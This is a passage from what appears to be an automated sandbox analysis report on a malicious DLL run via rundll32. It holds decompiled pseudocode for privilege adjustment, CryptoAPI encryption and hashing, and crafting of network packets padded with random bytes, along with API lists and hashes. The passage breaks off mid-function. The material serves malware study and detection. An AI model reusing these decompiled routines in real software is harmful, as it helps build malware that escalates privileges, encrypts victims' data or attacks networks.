                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,04E28555,?,?), ref: 04E284E5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Process$CloseHandleToken$Open$AllocateCheckCurrentDuplicateFreeInitializeMembershipTerminate
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2191316301-0
                                                                                                                                                              • Opcode ID: cc4581e22c46f5c33705a0cc5e512f56d9051f40bafbc04219bbe799a6876c0e
                                                                                                                                                              • Instruction ID: 799da3f62358e619cff0ae4f3792b45f359571f461170eb9d1cdb55b9c45e857
                                                                                                                                                              • Opcode Fuzzy Hash: cc4581e22c46f5c33705a0cc5e512f56d9051f40bafbc04219bbe799a6876c0e
                                                                                                                                                              • Instruction Fuzzy Hash: C2213B7190011CBFEB21AFA1EE88EAE7B7DFF04786F508126FA01A1090D7359E51DB60
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 77%
                                                                                                                                                              			E04E27CC5(WCHAR* _a4) {
                                                                                                                                                              				void* _v8;
                                                                                                                                                              				int _v12;
                                                                                                                                                              				intOrPtr _v16;
                                                                                                                                                              				struct _TOKEN_PRIVILEGES _v28;
                                                                                                                                                              				long _t23;
                                                                                                                                                              				int _t24;
                                                                                                                                                              
                                                                                                                                                              				_v28.PrivilegeCount = 0;
                                                                                                                                                              				asm("stosd");
                                                                                                                                                              				asm("stosd");
                                                                                                                                                              				asm("stosd");
                                                                                                                                                              				_t24 = 0;
                                                                                                                                                              				_v12 = 0;
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8) != 0 && LookupPrivilegeValueW(0, _a4,  &(_v28.Privileges)) != 0) {
                                                                                                                                                              					_v28.PrivilegeCount = 1;
                                                                                                                                                              					_v16 = 2;
                                                                                                                                                              					_t24 = AdjustTokenPrivileges(_v8, 0,  &_v28, 0, 0, 0);
                                                                                                                                                              					_t23 = GetLastError();
                                                                                                                                                              					_v12 = _t23;
                                                                                                                                                              					if(_t23 != 0) {
                                                                                                                                                              						_t24 = 0;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				SetLastError(_v12);
                                                                                                                                                              				return _t24;
                                                                                                                                                              			}









                                                                                                                                                              0x04e27cd2
                                                                                                                                                              0x04e27cd8
                                                                                                                                                              0x04e27cd9
                                                                                                                                                              0x04e27cda
                                                                                                                                                              0x04e27ce1
                                                                                                                                                              0x04e27ce3
                                                                                                                                                              0x04e27ce6
                                                                                                                                                              0x04e27cf8
                                                                                                                                                              0x04e27d17
                                                                                                                                                              0x04e27d1e
                                                                                                                                                              0x04e27d2b
                                                                                                                                                              0x04e27d2d
                                                                                                                                                              0x04e27d33
                                                                                                                                                              0x04e27d38
                                                                                                                                                              0x04e27d3a
                                                                                                                                                              0x04e27d3a
                                                                                                                                                              0x04e27d38
                                                                                                                                                              0x04e27d3f
                                                                                                                                                              0x04e27d4b

                                                                                                                                                              APIs
                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,?,00000000,?,?,?,04E279E8), ref: 04E27CE9
                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,00000000,?,?,?,04E279E8), ref: 04E27CF0
                                                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 04E27D02
                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 04E27D25
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 04E27D2D
                                                                                                                                                              • SetLastError.KERNEL32(?,?,00000000,?,?,?,04E279E8), ref: 04E27D3F
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLastProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2365211911-0
                                                                                                                                                              • Opcode ID: 1ee8f2c81a577fd3b0f2935d16b31297769783285deef03baedefca776f9a700
                                                                                                                                                              • Instruction ID: fcd9439a69a3f9df8038d5c55da47871398f23c1350672af8d008d351546efeb
                                                                                                                                                              • Opcode Fuzzy Hash: 1ee8f2c81a577fd3b0f2935d16b31297769783285deef03baedefca776f9a700
                                                                                                                                                              • Instruction Fuzzy Hash: A8113976A01228BFDB109FE6DD88DEFBFBCEB09705F104425EA05E2150D7759A458BE0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 16%
                                                                                                                                                              			E04E2559B(intOrPtr _a4) {
                                                                                                                                                              				long _v8;
                                                                                                                                                              				char _v12;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				void* _v20;
                                                                                                                                                              				void* _t19;
                                                                                                                                                              				intOrPtr* _t25;
                                                                                                                                                              
                                                                                                                                                              				_t25 = __imp__CryptSetKeyParam;
                                                                                                                                                              				_v12 = 1;
                                                                                                                                                              				 *_t25(_a4, 4,  &_v12, 0);
                                                                                                                                                              				_v16 = 1;
                                                                                                                                                              				 *_t25(_a4, 3,  &_v16, 0);
                                                                                                                                                              				_t19 =  &_v8;
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				__imp__CryptGetKeyParam(_a4, 1, 0, _t19, 0);
                                                                                                                                                              				if(_t19 != 0 && _v8 != 0) {
                                                                                                                                                              					_t19 = LocalAlloc(0x40, _v8);
                                                                                                                                                              					_v20 = _t19;
                                                                                                                                                              					if(_t19 != 0) {
                                                                                                                                                              						 *_t25(_a4, 1, _t19, 0);
                                                                                                                                                              						return LocalFree(_v20);
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return _t19;
                                                                                                                                                              			}









                                                                                                                                                              0x04e255a3
                                                                                                                                                              0x04e255b9
                                                                                                                                                              0x04e255bc
                                                                                                                                                              0x04e255c8
                                                                                                                                                              0x04e255cb
                                                                                                                                                              0x04e255ce
                                                                                                                                                              0x04e255d7
                                                                                                                                                              0x04e255da
                                                                                                                                                              0x04e255e2
                                                                                                                                                              0x04e255ee
                                                                                                                                                              0x04e255f4
                                                                                                                                                              0x04e255f9
                                                                                                                                                              0x04e25601
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e25606
                                                                                                                                                              0x04e255f9
                                                                                                                                                              0x04e25610

                                                                                                                                                              APIs
                                                                                                                                                              • CryptSetKeyParam.ADVAPI32(?,00000004,?,00000000,?,?,00000000), ref: 04E255BC
                                                                                                                                                              • CryptSetKeyParam.ADVAPI32(?,00000003,?,00000000), ref: 04E255CB
                                                                                                                                                              • CryptGetKeyParam.ADVAPI32(?,00000001,00000000,?,00000000), ref: 04E255DA
                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 04E255EE
                                                                                                                                                              • CryptSetKeyParam.ADVAPI32(?,00000001,00000000,00000000), ref: 04E25601
                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 04E25606
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CryptParam$Local$AllocFree
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3966954206-0
                                                                                                                                                              • Opcode ID: 831a43faba76061ecc7c027860e1271f2b044f025ea51f2c104cefd8975713ab
                                                                                                                                                              • Instruction ID: 0d88ce19b4ae93fdec1d2011a8da9643009002a592f0f3e6dcb58b856fa3504b
                                                                                                                                                              • Opcode Fuzzy Hash: 831a43faba76061ecc7c027860e1271f2b044f025ea51f2c104cefd8975713ab
                                                                                                                                                              • Instruction Fuzzy Hash: F90125B2900218FFEB219F96DE84DAFBF7DEB44395F004466FA05A2050D2759A54EBA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 25%
                                                                                                                                                              			E04E256D8(int* __eax, intOrPtr _a4, void* _a8, void** _a12) {
                                                                                                                                                              				long _v8;
                                                                                                                                                              				void* _v12;
                                                                                                                                                              				void* _v16;
                                                                                                                                                              				void* _t20;
                                                                                                                                                              				intOrPtr _t22;
                                                                                                                                                              				void* _t23;
                                                                                                                                                              				int* _t25;
                                                                                                                                                              				int _t26;
                                                                                                                                                              				void* _t29;
                                                                                                                                                              				void* _t30;
                                                                                                                                                              				intOrPtr* _t31;
                                                                                                                                                              				void** _t33;
                                                                                                                                                              				void* _t34;
                                                                                                                                                              
                                                                                                                                                              				_t25 = __eax;
                                                                                                                                                              				_v12 = 0;
                                                                                                                                                              				if(_a12 != 0 && __eax != 0) {
                                                                                                                                                              					_t31 = __imp__CryptEncrypt;
                                                                                                                                                              					_v8 = 0xf0;
                                                                                                                                                              					 *_t31(_a4, 0, 1, 0, 0,  &_v8, 0, _t30, _t34);
                                                                                                                                                              					if(0 != 0) {
                                                                                                                                                              						_t20 = LocalAlloc(0x40, _v8);
                                                                                                                                                              						_v16 = _t20;
                                                                                                                                                              						 *_a12 = _t20;
                                                                                                                                                              						if(_t20 != 0) {
                                                                                                                                                              							memcpy(_t20, _a8, 0xf0);
                                                                                                                                                              							 *_t25 = 0xf0;
                                                                                                                                                              							_t22 =  *_t31(_a4, 0, 1, 0, _v16, _t25, _v8);
                                                                                                                                                              							_v12 = _t22;
                                                                                                                                                              							if(_t22 == 0) {
                                                                                                                                                              								_t33 = _a12;
                                                                                                                                                              								_t26 =  *_t25;
                                                                                                                                                              								_t23 =  *_t33;
                                                                                                                                                              								_t29 = _t23;
                                                                                                                                                              								while(_t26 != 0) {
                                                                                                                                                              									 *_t29 = 0;
                                                                                                                                                              									_t29 = _t29 + 1;
                                                                                                                                                              									_t26 = _t26 - 1;
                                                                                                                                                              								}
                                                                                                                                                              								LocalFree(_t23);
                                                                                                                                                              								 *_t33 = 0;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return _v12;
                                                                                                                                                              			}
















                                                                                                                                                              0x04e256df
                                                                                                                                                              0x04e256e3
                                                                                                                                                              0x04e256e9
                                                                                                                                                              0x04e256f9
                                                                                                                                                              0x04e25711
                                                                                                                                                              0x04e25714
                                                                                                                                                              0x04e25718
                                                                                                                                                              0x04e2571f
                                                                                                                                                              0x04e25728
                                                                                                                                                              0x04e2572b
                                                                                                                                                              0x04e2572f
                                                                                                                                                              0x04e25736
                                                                                                                                                              0x04e25741
                                                                                                                                                              0x04e25750
                                                                                                                                                              0x04e25752
                                                                                                                                                              0x04e25757
                                                                                                                                                              0x04e25759
                                                                                                                                                              0x04e2575c
                                                                                                                                                              0x04e2575e
                                                                                                                                                              0x04e25760
                                                                                                                                                              0x04e25764
                                                                                                                                                              0x04e25766
                                                                                                                                                              0x04e25769
                                                                                                                                                              0x04e2576a
                                                                                                                                                              0x04e2576a
                                                                                                                                                              0x04e2576e
                                                                                                                                                              0x04e25774
                                                                                                                                                              0x04e25774
                                                                                                                                                              0x04e25757
                                                                                                                                                              0x04e2572f
                                                                                                                                                              0x04e25777
                                                                                                                                                              0x04e2577d

                                                                                                                                                              APIs
                                                                                                                                                              • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,?,?,?,?), ref: 04E25714
                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?,?,?,?), ref: 04E2571F
                                                                                                                                                              • memcpy.MSVCRT ref: 04E25736
                                                                                                                                                              • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 04E25750
                                                                                                                                                              • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 04E2576E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CryptEncryptLocal$AllocFreememcpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 55365748-0
                                                                                                                                                              • Opcode ID: e21a18303ae260ba76ed4970fbb3413a95b8b974102dfa54bf1271f00c845bac
                                                                                                                                                              • Instruction ID: e93152476588f9390f5b901674e9516d000fd9b4e89f8b48179e47ec798a4e6c
                                                                                                                                                              • Opcode Fuzzy Hash: e21a18303ae260ba76ed4970fbb3413a95b8b974102dfa54bf1271f00c845bac
                                                                                                                                                              • Instruction Fuzzy Hash: 10219075940225FFCF219FA5DE84EAEBFA9EF08354F104065F904E3250D6719A00CBA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • CryptBinaryToStringW.CRYPT32(?,00000000,00000001,00000000,?), ref: 04E2579E
                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?,00000000,?,04E25988,00000000,?,?,?,?,?,?,?,?), ref: 04E257AD
                                                                                                                                                              • CryptBinaryToStringW.CRYPT32(?,00000000,00000001,00000000,?), ref: 04E257C6
                                                                                                                                                              • LocalFree.KERNEL32(00000000,?,04E25988,00000000,?,?,?,?,?,?,?,?), ref: 04E257D6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: BinaryCryptLocalString$AllocFree
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4291131564-0
                                                                                                                                                              • Opcode ID: eee5623a9e3bc833f0b6cce4d37be7647413eb3fc0bc12c129156e17dd3889c7
                                                                                                                                                              • Instruction ID: 88fe3ec8116c702f2d0b36dc631c46f1c2c97d97a1cc4e3cd9632b5a0c96173e
                                                                                                                                                              • Opcode Fuzzy Hash: eee5623a9e3bc833f0b6cce4d37be7647413eb3fc0bc12c129156e17dd3889c7
                                                                                                                                                              • Instruction Fuzzy Hash: 7F016D7620021DFFEB118F99DE80EAE7BADEF45754F104025FA0097210E7B1DE009B60
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,?,00000000,?,?,04E262E9,?,?,?,?), ref: 04E26260
                                                                                                                                                              • CryptHashData.ADVAPI32(?,?,00000021,00000000,?,?,04E262E9,?,?,?,?), ref: 04E26273
                                                                                                                                                              • CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000,?,?,04E262E9,?,?,?,?), ref: 04E26289
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CryptHash$CreateDataParam
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3669532303-0
                                                                                                                                                              • Opcode ID: 3ba96025b2ff01a8458a845f9a6cadc39f688016c0eaaaed812dbaeb4bf9481f
                                                                                                                                                              • Instruction ID: 946c6491571a068ed12d59e63d6f4c2f080be1dbb25eddf99ce23dff21e4f1c6
                                                                                                                                                              • Opcode Fuzzy Hash: 3ba96025b2ff01a8458a845f9a6cadc39f688016c0eaaaed812dbaeb4bf9481f
                                                                                                                                                              • Instruction Fuzzy Hash: 8AF01DB2201308BFE7218FA5EEC4EAB77BDFB44745B604829F206D6150D771AD048B20
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 60%
                                                                                                                                                              			E04E229A2(intOrPtr _a4, void** _a8, short _a12, intOrPtr* _a16) {
                                                                                                                                                              				void* _v8;
                                                                                                                                                              				signed int _v12;
                                                                                                                                                              				void* _v16;
                                                                                                                                                              				void* _v20;
                                                                                                                                                              				signed int _v24;
                                                                                                                                                              				signed int _v28;
                                                                                                                                                              				signed int _v32;
                                                                                                                                                              				void* _t160;
                                                                                                                                                              				signed int _t166;
                                                                                                                                                              				void* _t172;
                                                                                                                                                              				intOrPtr _t173;
                                                                                                                                                              				short _t174;
                                                                                                                                                              				short _t175;
                                                                                                                                                              				signed int _t179;
                                                                                                                                                              				short _t182;
                                                                                                                                                              				signed int _t183;
                                                                                                                                                              				signed int _t185;
                                                                                                                                                              				intOrPtr _t188;
                                                                                                                                                              				short _t189;
                                                                                                                                                              				void* _t192;
                                                                                                                                                              				void* _t195;
                                                                                                                                                              				void* _t204;
                                                                                                                                                              				short _t207;
                                                                                                                                                              				short _t208;
                                                                                                                                                              				short _t209;
                                                                                                                                                              				void* _t217;
                                                                                                                                                              				short _t223;
                                                                                                                                                              				short _t224;
                                                                                                                                                              				void* _t226;
                                                                                                                                                              				void* _t227;
                                                                                                                                                              				void* _t235;
                                                                                                                                                              				void* _t240;
                                                                                                                                                              				signed int _t241;
                                                                                                                                                              				signed int _t246;
                                                                                                                                                              				signed int _t247;
                                                                                                                                                              				signed int _t252;
                                                                                                                                                              				signed int _t254;
                                                                                                                                                              				intOrPtr _t261;
                                                                                                                                                              				signed int _t262;
                                                                                                                                                              				void* _t264;
                                                                                                                                                              				signed int _t271;
                                                                                                                                                              				void** _t273;
                                                                                                                                                              				signed int _t277;
                                                                                                                                                              				intOrPtr* _t279;
                                                                                                                                                              				intOrPtr _t280;
                                                                                                                                                              				void** _t281;
                                                                                                                                                              				void* _t285;
                                                                                                                                                              				void* _t286;
                                                                                                                                                              				void* _t289;
                                                                                                                                                              				intOrPtr _t293;
                                                                                                                                                              				void* _t297;
                                                                                                                                                              				void* _t300;
                                                                                                                                                              				void* _t302;
                                                                                                                                                              				void* _t304;
                                                                                                                                                              				intOrPtr* _t305;
                                                                                                                                                              				intOrPtr* _t306;
                                                                                                                                                              				void* _t307;
                                                                                                                                                              				void* _t308;
                                                                                                                                                              				void* _t309;
                                                                                                                                                              				void* _t310;
                                                                                                                                                              				void* _t313;
                                                                                                                                                              
                                                                                                                                                              				_v24 = 0xbadf00d;
                                                                                                                                                              				_t160 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
                                                                                                                                                              				_v8 = _t160;
                                                                                                                                                              				if(_t160 == 0) {
                                                                                                                                                              					L30:
                                                                                                                                                              					return _v24;
                                                                                                                                                              				}
                                                                                                                                                              				_t240 = HeapAlloc(GetProcessHeap(), 8, 0x1124);
                                                                                                                                                              				if(_t240 == 0) {
                                                                                                                                                              					L29:
                                                                                                                                                              					HeapFree(GetProcessHeap(), 8, _v8);
                                                                                                                                                              					goto L30;
                                                                                                                                                              				}
                                                                                                                                                              				_t273 = _a8;
                                                                                                                                                              				_t166 = rand();
                                                                                                                                                              				asm("cdq");
                                                                                                                                                              				_t241 = 0x14;
                                                                                                                                                              				 *((intOrPtr*)( *_t273 + 0x22)) =  *((intOrPtr*)( *_t273 + 0x22)) + _t166 % _t241;
                                                                                                                                                              				_t297 =  *_t273;
                                                                                                                                                              				_v28 = ( *(_t297 + 0x22) & 0x0000ff00) - 0x00000100 & 0x0000ffff;
                                                                                                                                                              				_t172 = memcpy(_t240, _t297, 0x100 << 2);
                                                                                                                                                              				_t308 = _t307 + 0xc;
                                                                                                                                                              				__imp__#9(0x50, 9);
                                                                                                                                                              				 *(_t240 + 2) = _t172;
                                                                                                                                                              				_t173 = 4;
                                                                                                                                                              				 *((intOrPtr*)(_t240 + 0x28)) = _t173;
                                                                                                                                                              				 *((intOrPtr*)(_t240 + 0x38)) = _t173;
                                                                                                                                                              				_t174 = 5;
                                                                                                                                                              				 *((short*)(_t240 + 0x49)) = _t174;
                                                                                                                                                              				_t175 = 7;
                                                                                                                                                              				_t277 = 0;
                                                                                                                                                              				 *((short*)(_t240 + 0x4b)) = _t175;
                                                                                                                                                              				 *((char*)(_t240 + 8)) = 0xa0;
                                                                                                                                                              				 *((intOrPtr*)(_t240 + 0x24)) = 0x13;
                                                                                                                                                              				 *(_t240 + 0x2c) = 0x10d0;
                                                                                                                                                              				 *((intOrPtr*)(_t240 + 0x30)) = 0x3f40;
                                                                                                                                                              				 *(_t240 + 0x34) = 0x10d0;
                                                                                                                                                              				 *((intOrPtr*)(_t240 + 0x3c)) = 0x4c;
                                                                                                                                                              				 *(_t240 + 0x40) = 0;
                                                                                                                                                              				 *(_t240 + 0x44) = 0;
                                                                                                                                                              				 *((char*)(_t240 + 0x48)) = 0;
                                                                                                                                                              				 *((short*)(_t240 + 0x50)) = _a12;
                                                                                                                                                              				do {
                                                                                                                                                              					 *((char*)(_t240 + _t277 + 0x54)) = rand();
                                                                                                                                                              					_t277 = _t277 + 1;
                                                                                                                                                              				} while (_t277 < 0x10d0);
                                                                                                                                                              				_v12 = _v12 & 0x00000000;
                                                                                                                                                              				do {
                                                                                                                                                              					_t179 = rand();
                                                                                                                                                              					_t246 = 0x14;
                                                                                                                                                              					asm("cdq");
                                                                                                                                                              					 *((intOrPtr*)( *_a8 + 0x22)) =  *((intOrPtr*)( *_a8 + 0x22)) + _t179 % _t246;
                                                                                                                                                              					_t279 = _a8;
                                                                                                                                                              					_t182 =  *((intOrPtr*)( *_t279 + 0x22));
                                                                                                                                                              					 *((short*)(_t240 + 0x22)) = _t182;
                                                                                                                                                              					__imp__#19(_a4, _t240, 0x54, 0);
                                                                                                                                                              					if(_t182 <= 0) {
                                                                                                                                                              						goto L7;
                                                                                                                                                              					}
                                                                                                                                                              					__imp__#16(_a4, _v8, 0xffff, 0);
                                                                                                                                                              					if(_t182 <= 0) {
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              					L7:
                                                                                                                                                              					_v12 = _v12 + 1;
                                                                                                                                                              				} while (_v12 < 4);
                                                                                                                                                              				_t280 =  *_t279;
                                                                                                                                                              				_t183 = rand();
                                                                                                                                                              				asm("cdq");
                                                                                                                                                              				_t247 = 0x14;
                                                                                                                                                              				_t185 = _t183 % _t247 +  *(_t280 + 0x22) & 0x0000ffff;
                                                                                                                                                              				_v32 = _t185;
                                                                                                                                                              				 *(_t280 + 0x22) = _t185;
                                                                                                                                                              				__imp__#9(0x1120);
                                                                                                                                                              				_t281 = _a8;
                                                                                                                                                              				 *(_t240 + 2) = _t185;
                                                                                                                                                              				 *((short*)(_t240 + 0x22)) =  *((intOrPtr*)( *_t281 + 0x22));
                                                                                                                                                              				_t188 = 4;
                                                                                                                                                              				 *((intOrPtr*)(_t240 + 0x28)) = _t188;
                                                                                                                                                              				 *((intOrPtr*)(_t240 + 0x24)) = 0x13;
                                                                                                                                                              				 *(_t240 + 0x2c) = 0x10d0;
                                                                                                                                                              				 *((intOrPtr*)(_t240 + 0x38)) = _t188;
                                                                                                                                                              				_t189 = 5;
                                                                                                                                                              				 *((short*)(_t240 + 0x49)) = _t189;
                                                                                                                                                              				 *((intOrPtr*)(_t240 + 0x30)) =  *((intOrPtr*)( *_a16 + 0x74)) - 0x10d0;
                                                                                                                                                              				 *(_t240 + 0x34) = 0x10d0;
                                                                                                                                                              				 *((intOrPtr*)(_t240 + 0x3c)) = 0x4c;
                                                                                                                                                              				 *(_t240 + 0x40) = 0x10d0;
                                                                                                                                                              				 *(_t240 + 0x44) = 0x50;
                                                                                                                                                              				 *((char*)(_t240 + 0x48)) = 0;
                                                                                                                                                              				 *((short*)(_t240 + 0x4b)) = 0x10d7;
                                                                                                                                                              				_t192 = HeapAlloc(GetProcessHeap(), 8, 0x160);
                                                                                                                                                              				_v20 = _t192;
                                                                                                                                                              				if(_t192 == 0) {
                                                                                                                                                              					L28:
                                                                                                                                                              					HeapFree(GetProcessHeap(), 8, _t240);
                                                                                                                                                              					goto L29;
                                                                                                                                                              				}
                                                                                                                                                              				_t252 = 9;
                                                                                                                                                              				_t195 = memcpy(_t192,  *_t281, _t252 << 2);
                                                                                                                                                              				_t309 = _t308 + 0xc;
                                                                                                                                                              				__imp__#9(0x15c);
                                                                                                                                                              				_t300 = _v20;
                                                                                                                                                              				 *(_t300 + 2) = _t195;
                                                                                                                                                              				 *((intOrPtr*)(_t300 + 0x2c)) = 0x114;
                                                                                                                                                              				 *((intOrPtr*)(_t300 + 0x3c)) = 0x114;
                                                                                                                                                              				 *((char*)(_t300 + 8)) = 0xa1;
                                                                                                                                                              				 *((char*)(_t300 + 0x24)) = 0x12;
                                                                                                                                                              				 *(_t300 + 0x40) = 0x48;
                                                                                                                                                              				 *((short*)(_t300 + 0x49)) = 0x115;
                                                                                                                                                              				_t285 = 0;
                                                                                                                                                              				do {
                                                                                                                                                              					 *((char*)(_t300 + _t285 + 0x4c)) = rand();
                                                                                                                                                              					_t285 = _t285 + 1;
                                                                                                                                                              				} while (_t285 <  *((intOrPtr*)(_t300 + 0x3c)));
                                                                                                                                                              				_t286 = HeapAlloc(GetProcessHeap(), 8, 0x48);
                                                                                                                                                              				_v16 = _t286;
                                                                                                                                                              				if(_t286 == 0) {
                                                                                                                                                              					L27:
                                                                                                                                                              					HeapFree(GetProcessHeap(), 8, _t300);
                                                                                                                                                              					goto L28;
                                                                                                                                                              				}
                                                                                                                                                              				_t254 = 9;
                                                                                                                                                              				_t204 = memcpy(_t286,  *_a8, _t254 << 2);
                                                                                                                                                              				_t310 = _t309 + 0xc;
                                                                                                                                                              				__imp__#9(0x44);
                                                                                                                                                              				_t302 = _v16;
                                                                                                                                                              				 *(_t302 + 2) = _t204;
                                                                                                                                                              				 *((short*)(_t302 + 0x22)) = _v28;
                                                                                                                                                              				 *((short*)(_t302 + 0x25)) = 0x200;
